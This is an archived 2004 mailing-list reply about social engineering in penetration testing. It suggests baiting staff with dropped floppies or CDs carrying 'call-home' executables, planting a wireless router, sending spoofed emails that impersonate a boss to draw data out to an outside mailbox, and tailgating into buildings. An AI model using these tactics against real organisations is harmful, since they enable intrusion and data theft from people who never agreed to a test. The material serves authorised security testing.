Re: physical security pentesting and social engineering

From: Gadi Evron (ge@linuxbox.org)
Date: Sat Dec 04 2004 - 07:35:58 EST


I originally planned to email it for the social engineering thread, but
our moderator closed it.

-----

Bones wrote:

> I am sure this has been asked here several times before, but if
> everyone could indulge me I would be grateful.
>
> I am trying to find some good resources for social engineering
> methodologies and such performed as part of pen-test work.
>
> Books, links, previous SF posts (date/subject) etc. are all welcome.

Hi. I've seen many people on this thread providing you with reading
material and some suggestions on where to learn more - I've learned a
lot from it myself.

I will try and give you five simple and practical examples. You can take
it from there:
1. Drop a floppy near the closest vending machine or in-building
    dining-room. Put a call-home executable on it with a shiny icon and
    name.
2. Drop a CD saying "fourth quarter layoffs" in the elevator, put an
    auto-run with your call-home bit.
3. Give away some PC mags at the entrance or across the street, and put
    your CD in.
4. Drop a wireless router in the middle of the building (plan according
    to corporate culture. Someone might actually pick it up, or ignore
    it). You can even write on the button asking people to call security
    (then try that again with promise of a reward). Consider putting it
    in a rack.
5. Try gathering a tiny bit of info about workers and friends, then send
    a (possibly spoofed) email, with a small surprise inside. You can be
    a boss going abroad and asking for info to be sent to an hotmail
    box.. or just a friend of a friend (or the friend itself) sending a
    cool flash program.

Other than that I'd also try to trick my way into places.. running after
doors, asking for people to keep them open for me, or hold on to
something.. maybe even speak my way into the building/premises itself.
But that would take research (or being small).

Ever tried waving a 20 bill as if it is a credential and going in? :)

If you plan anything big, make sure you go big. Get actors and do your
research. For a simple pen-test it won't be required - but that is only
my bet.

There is no such thing as a non-successful pen-test. If there is - you
loss, and not just financially. The ego involved with this is not to be
underestimated - "we passed the pen-test!". That is why I believe in
social engineering for penetration testing.

I hope this helps!

:)

     Gadi Evron.



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:09 EDT